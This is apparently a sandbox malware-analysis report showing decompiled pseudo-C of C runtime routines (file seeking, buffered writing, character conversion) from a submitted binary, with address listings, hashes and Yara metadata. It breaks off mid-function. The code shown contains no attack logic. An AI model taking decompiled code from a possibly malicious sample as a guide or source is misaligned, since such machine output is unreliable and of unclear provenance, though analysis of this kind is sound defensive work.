                                                                                                                                                                                                        														goto L39;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_push(0);
                                                                                                                                                                                                        										_push(_t48);
                                                                                                                                                                                                        										_push(_t53[0x10]);
                                                                                                                                                                                                        										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                        										_t53[1] = 0;
                                                                                                                                                                                                        										 *_t53 = _t53[0x11];
                                                                                                                                                                                                        										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 < 0) {
                                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t53[0x1a] = _t48;
                                                                                                                                                                                                        											_t53[0x19] = _t48;
                                                                                                                                                                                                        											return _t48;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(_t43 == 0) {
                                                                                                                                                                                                        									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(_t48 < 0) {
                                                                                                                                                                                                        									L39:
                                                                                                                                                                                                        									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                        									__eflags = _t32;
                                                                                                                                                                                                        									return _t32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t53[0x11] != 0) {
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										if(_t48 <= 0) {
                                                                                                                                                                                                        											L17:
                                                                                                                                                                                                        											return _t53[0x19];
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                                        												_t39 = 0x4000;
                                                                                                                                                                                                        												if(_t48 < 0x4000) {
                                                                                                                                                                                                        													_t39 = _t48;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                        												_t55 = _t55 + 0xc;
                                                                                                                                                                                                        												if(_t30 == 0) {
                                                                                                                                                                                                        													goto L39;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t48 = _t48 - _t30;
                                                                                                                                                                                                        												if(_t48 > 0) {
                                                                                                                                                                                                        													continue;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L41;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                        										_t57 = _t55 + 4;
                                                                                                                                                                                                        										_t53[0x11] = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                                        											_t55 = _t57 + 0xc;
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L41:
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00405d00
                                                                                                                                                                                                        0x00405d00
                                                                                                                                                                                                        0x00405d00
                                                                                                                                                                                                        0x00405d01
                                                                                                                                                                                                        0x00405d07
                                                                                                                                                                                                        0x00405e7f
                                                                                                                                                                                                        0x00405e7f
                                                                                                                                                                                                        0x00405e7f
                                                                                                                                                                                                        0x00405e83
                                                                                                                                                                                                        0x00405d0d
                                                                                                                                                                                                        0x00405d0d
                                                                                                                                                                                                        0x00405d14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d1a
                                                                                                                                                                                                        0x00405d1a
                                                                                                                                                                                                        0x00405d20
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d2f
                                                                                                                                                                                                        0x00405d34
                                                                                                                                                                                                        0x00405d38
                                                                                                                                                                                                        0x00405dad
                                                                                                                                                                                                        0x00405db0
                                                                                                                                                                                                        0x00405db2
                                                                                                                                                                                                        0x00405db2
                                                                                                                                                                                                        0x00405db2
                                                                                                                                                                                                        0x00405db5
                                                                                                                                                                                                        0x00405db7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405dbd
                                                                                                                                                                                                        0x00405dbd
                                                                                                                                                                                                        0x00405dc1
                                                                                                                                                                                                        0x00405df8
                                                                                                                                                                                                        0x00405dfb
                                                                                                                                                                                                        0x00405dfd
                                                                                                                                                                                                        0x00405e04
                                                                                                                                                                                                        0x00405e09
                                                                                                                                                                                                        0x00405e0c
                                                                                                                                                                                                        0x00405e0e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405dff
                                                                                                                                                                                                        0x00405dff
                                                                                                                                                                                                        0x00405e10
                                                                                                                                                                                                        0x00405e10
                                                                                                                                                                                                        0x00405e12
                                                                                                                                                                                                        0x00405e73
                                                                                                                                                                                                        0x00405e78
                                                                                                                                                                                                        0x00405e14
                                                                                                                                                                                                        0x00405e14
                                                                                                                                                                                                        0x00405e18
                                                                                                                                                                                                        0x00405e2e
                                                                                                                                                                                                        0x00405e2e
                                                                                                                                                                                                        0x00405e32
                                                                                                                                                                                                        0x00405e34
                                                                                                                                                                                                        0x00405e37
                                                                                                                                                                                                        0x00405e38
                                                                                                                                                                                                        0x00405e3c
                                                                                                                                                                                                        0x00405e43
                                                                                                                                                                                                        0x00405e45
                                                                                                                                                                                                        0x00405e45
                                                                                                                                                                                                        0x00405e43
                                                                                                                                                                                                        0x00405e4c
                                                                                                                                                                                                        0x00405e4e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405e50
                                                                                                                                                                                                        0x00405e50
                                                                                                                                                                                                        0x00405e50
                                                                                                                                                                                                        0x00405e55
                                                                                                                                                                                                        0x00405e57
                                                                                                                                                                                                        0x00405e59
                                                                                                                                                                                                        0x00405e59
                                                                                                                                                                                                        0x00405e61
                                                                                                                                                                                                        0x00405e66
                                                                                                                                                                                                        0x00405e69
                                                                                                                                                                                                        0x00405e6b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405e6d
                                                                                                                                                                                                        0x00405e6f
                                                                                                                                                                                                        0x00405e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405e50
                                                                                                                                                                                                        0x00405e1a
                                                                                                                                                                                                        0x00405e1f
                                                                                                                                                                                                        0x00405e24
                                                                                                                                                                                                        0x00405e27
                                                                                                                                                                                                        0x00405e2a
                                                                                                                                                                                                        0x00405e2c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405e2c
                                                                                                                                                                                                        0x00405e18
                                                                                                                                                                                                        0x00405e12
                                                                                                                                                                                                        0x00405dc3
                                                                                                                                                                                                        0x00405dc9
                                                                                                                                                                                                        0x00405dcb
                                                                                                                                                                                                        0x00405dcc
                                                                                                                                                                                                        0x00405dcd
                                                                                                                                                                                                        0x00405dd4
                                                                                                                                                                                                        0x00405ddb
                                                                                                                                                                                                        0x00405ddd
                                                                                                                                                                                                        0x00405de5
                                                                                                                                                                                                        0x00405de7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405ded
                                                                                                                                                                                                        0x00405ded
                                                                                                                                                                                                        0x00405df0
                                                                                                                                                                                                        0x00405df7
                                                                                                                                                                                                        0x00405df7
                                                                                                                                                                                                        0x00405de7
                                                                                                                                                                                                        0x00405dc1
                                                                                                                                                                                                        0x00405d3a
                                                                                                                                                                                                        0x00405d3c
                                                                                                                                                                                                        0x00405d3e
                                                                                                                                                                                                        0x00405d3e
                                                                                                                                                                                                        0x00405d43
                                                                                                                                                                                                        0x00405e79
                                                                                                                                                                                                        0x00405e7a
                                                                                                                                                                                                        0x00405e7a
                                                                                                                                                                                                        0x00405e7e
                                                                                                                                                                                                        0x00405d49
                                                                                                                                                                                                        0x00405d4d
                                                                                                                                                                                                        0x00405d77
                                                                                                                                                                                                        0x00405d79
                                                                                                                                                                                                        0x00405da7
                                                                                                                                                                                                        0x00405dac
                                                                                                                                                                                                        0x00405d7b
                                                                                                                                                                                                        0x00405d80
                                                                                                                                                                                                        0x00405d80
                                                                                                                                                                                                        0x00405d87
                                                                                                                                                                                                        0x00405d89
                                                                                                                                                                                                        0x00405d89
                                                                                                                                                                                                        0x00405d91
                                                                                                                                                                                                        0x00405d96
                                                                                                                                                                                                        0x00405d9b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405da1
                                                                                                                                                                                                        0x00405da5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405da5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d80
                                                                                                                                                                                                        0x00405d4f
                                                                                                                                                                                                        0x00405d54
                                                                                                                                                                                                        0x00405d59
                                                                                                                                                                                                        0x00405d5c
                                                                                                                                                                                                        0x00405d61
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d67
                                                                                                                                                                                                        0x00405d6f
                                                                                                                                                                                                        0x00405d74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d74
                                                                                                                                                                                                        0x00405d61
                                                                                                                                                                                                        0x00405d4d
                                                                                                                                                                                                        0x00405d43
                                                                                                                                                                                                        0x00405d38
                                                                                                                                                                                                        0x00405d20
                                                                                                                                                                                                        0x00405d14
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 208892515-0
                                                                                                                                                                                                        • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        				signed int _t75;
                                                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                                                        				signed int _t78;
                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                                                        				intOrPtr* _t100;
                                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t90 = __edx;
                                                                                                                                                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t100 = _a16;
                                                                                                                                                                                                        					_t105 = _t100;
                                                                                                                                                                                                        					if(_t100 != 0) {
                                                                                                                                                                                                        						_t82 = _a4;
                                                                                                                                                                                                        						__eflags = _t82;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                        						_t90 = _t63 % _a8;
                                                                                                                                                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                        						if(__eflags > 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t97 = _a8 * _a12;
                                                                                                                                                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                        						_v8 = _t82;
                                                                                                                                                                                                        						_v16 = _t97;
                                                                                                                                                                                                        						_t81 = _t97;
                                                                                                                                                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                        							_v12 = 0x1000;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t97;
                                                                                                                                                                                                        						if(_t97 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							return _a12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                        								__eflags = _t84;
                                                                                                                                                                                                        								if(_t84 == 0) {
                                                                                                                                                                                                        									L18:
                                                                                                                                                                                                        									__eflags = _t81 - _v12;
                                                                                                                                                                                                        									if(_t81 < _v12) {
                                                                                                                                                                                                        										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                        										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                        										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                        											L34:
                                                                                                                                                                                                        											_t69 = _t97;
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v8 = _v8 + 1;
                                                                                                                                                                                                        										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                        										_t81 = _t81 - 1;
                                                                                                                                                                                                        										_v12 = _t72;
                                                                                                                                                                                                        										__eflags = _t72;
                                                                                                                                                                                                        										if(_t72 <= 0) {
                                                                                                                                                                                                        											_v12 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags = _t84;
                                                                                                                                                                                                        									if(_t84 == 0) {
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										__eflags = _v12;
                                                                                                                                                                                                        										_t98 = _t81;
                                                                                                                                                                                                        										if(_v12 != 0) {
                                                                                                                                                                                                        											_t75 = _t81;
                                                                                                                                                                                                        											_t90 = _t75 % _v12;
                                                                                                                                                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                        											__eflags = _t98;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push(_t98);
                                                                                                                                                                                                        										_push(_v8);
                                                                                                                                                                                                        										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                        										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                        										_t101 = _t101 + 0xc;
                                                                                                                                                                                                        										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                        										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                        											L36:
                                                                                                                                                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                        											_t69 = _v16;
                                                                                                                                                                                                        											goto L35;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t88 = _t98;
                                                                                                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                                                                                                        											if(_t74 <= _t98) {
                                                                                                                                                                                                        												_t88 = _t74;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_v8 = _v8 + _t88;
                                                                                                                                                                                                        											_t81 = _t81 - _t88;
                                                                                                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                                                                                                        											if(_t74 < _t98) {
                                                                                                                                                                                                        												goto L36;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L27:
                                                                                                                                                                                                        												_t97 = _v16;
                                                                                                                                                                                                        												goto L31;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                        									__eflags = _t77;
                                                                                                                                                                                                        									if(_t77 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                        								__eflags = _t78;
                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                        									goto L18;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                                                                        									_t48 = _t100 + 0xc;
                                                                                                                                                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                        									__eflags =  *_t48;
                                                                                                                                                                                                        									goto L34;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t99 = _t81;
                                                                                                                                                                                                        								__eflags = _t81 - _t78;
                                                                                                                                                                                                        								if(_t81 >= _t78) {
                                                                                                                                                                                                        									_t99 = _t78;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                        								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                        								_t101 = _t101 + 0xc;
                                                                                                                                                                                                        								_t81 = _t81 - _t99;
                                                                                                                                                                                                        								_v8 = _v8 + _t99;
                                                                                                                                                                                                        								goto L27;
                                                                                                                                                                                                        								L31:
                                                                                                                                                                                                        								__eflags = _t81;
                                                                                                                                                                                                        							} while (_t81 != 0);
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *_t61 = 0x16;
                                                                                                                                                                                                        					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        0x0040baaa
                                                                                                                                                                                                        0x0040baba
                                                                                                                                                                                                        0x0040bae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bac1
                                                                                                                                                                                                        0x0040bac1
                                                                                                                                                                                                        0x0040bac4
                                                                                                                                                                                                        0x0040bac6
                                                                                                                                                                                                        0x0040bae7
                                                                                                                                                                                                        0x0040baea
                                                                                                                                                                                                        0x0040baec
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040baee
                                                                                                                                                                                                        0x0040baf3
                                                                                                                                                                                                        0x0040baf6
                                                                                                                                                                                                        0x0040baf9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bafe
                                                                                                                                                                                                        0x0040bb02
                                                                                                                                                                                                        0x0040bb09
                                                                                                                                                                                                        0x0040bb0c
                                                                                                                                                                                                        0x0040bb0f
                                                                                                                                                                                                        0x0040bb11
                                                                                                                                                                                                        0x0040bb1b
                                                                                                                                                                                                        0x0040bb13
                                                                                                                                                                                                        0x0040bb16
                                                                                                                                                                                                        0x0040bb16
                                                                                                                                                                                                        0x0040bb22
                                                                                                                                                                                                        0x0040bb24
                                                                                                                                                                                                        0x0040bbe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb2a
                                                                                                                                                                                                        0x0040bb2a
                                                                                                                                                                                                        0x0040bb2d
                                                                                                                                                                                                        0x0040bb2d
                                                                                                                                                                                                        0x0040bb33
                                                                                                                                                                                                        0x0040bb64
                                                                                                                                                                                                        0x0040bb64
                                                                                                                                                                                                        0x0040bb67
                                                                                                                                                                                                        0x0040bbc0
                                                                                                                                                                                                        0x0040bbc7
                                                                                                                                                                                                        0x0040bbca
                                                                                                                                                                                                        0x0040bbf5
                                                                                                                                                                                                        0x0040bbf5
                                                                                                                                                                                                        0x0040bbf7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbfb
                                                                                                                                                                                                        0x0040bbcc
                                                                                                                                                                                                        0x0040bbcf
                                                                                                                                                                                                        0x0040bbd2
                                                                                                                                                                                                        0x0040bbd3
                                                                                                                                                                                                        0x0040bbd6
                                                                                                                                                                                                        0x0040bbd8
                                                                                                                                                                                                        0x0040bbda
                                                                                                                                                                                                        0x0040bbda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbd8
                                                                                                                                                                                                        0x0040bb69
                                                                                                                                                                                                        0x0040bb6b
                                                                                                                                                                                                        0x0040bb78
                                                                                                                                                                                                        0x0040bb78
                                                                                                                                                                                                        0x0040bb7c
                                                                                                                                                                                                        0x0040bb7e
                                                                                                                                                                                                        0x0040bb82
                                                                                                                                                                                                        0x0040bb84
                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                        0x0040bb89
                                                                                                                                                                                                        0x0040bb8a
                                                                                                                                                                                                        0x0040bb94
                                                                                                                                                                                                        0x0040bb95
                                                                                                                                                                                                        0x0040bb9a
                                                                                                                                                                                                        0x0040bb9d
                                                                                                                                                                                                        0x0040bba0
                                                                                                                                                                                                        0x0040bc03
                                                                                                                                                                                                        0x0040bc03
                                                                                                                                                                                                        0x0040bc07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bba2
                                                                                                                                                                                                        0x0040bba2
                                                                                                                                                                                                        0x0040bba4
                                                                                                                                                                                                        0x0040bba6
                                                                                                                                                                                                        0x0040bba8
                                                                                                                                                                                                        0x0040bba8
                                                                                                                                                                                                        0x0040bbaa
                                                                                                                                                                                                        0x0040bbad
                                                                                                                                                                                                        0x0040bbaf
                                                                                                                                                                                                        0x0040bbb1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x0040bbb1
                                                                                                                                                                                                        0x0040bba0
                                                                                                                                                                                                        0x0040bb6e
                                                                                                                                                                                                        0x0040bb74
                                                                                                                                                                                                        0x0040bb76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb76
                                                                                                                                                                                                        0x0040bb35
                                                                                                                                                                                                        0x0040bb38
                                                                                                                                                                                                        0x0040bb3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb3c
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x0040bb42
                                                                                                                                                                                                        0x0040bb44
                                                                                                                                                                                                        0x0040bb46
                                                                                                                                                                                                        0x0040bb48
                                                                                                                                                                                                        0x0040bb48
                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                        0x0040bb55
                                                                                                                                                                                                        0x0040bb58
                                                                                                                                                                                                        0x0040bb5a
                                                                                                                                                                                                        0x0040bb5d
                                                                                                                                                                                                        0x0040bb5f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbe1
                                                                                                                                                                                                        0x0040bbe1
                                                                                                                                                                                                        0x0040bbe1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb2a
                                                                                                                                                                                                        0x0040bb24
                                                                                                                                                                                                        0x0040bac8
                                                                                                                                                                                                        0x0040bac8
                                                                                                                                                                                                        0x0040bacd
                                                                                                                                                                                                        0x0040bace
                                                                                                                                                                                                        0x0040bacf
                                                                                                                                                                                                        0x0040bad0
                                                                                                                                                                                                        0x0040bad1
                                                                                                                                                                                                        0x0040bad2
                                                                                                                                                                                                        0x0040bad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040badd

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3240763771-0
                                                                                                                                                                                                        • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				char _t43;
                                                                                                                                                                                                        				char _t46;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t57;
                                                                                                                                                                                                        				int _t58;
                                                                                                                                                                                                        				signed short* _t59;
                                                                                                                                                                                                        				short* _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char* _t72;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 = _a8;
                                                                                                                                                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
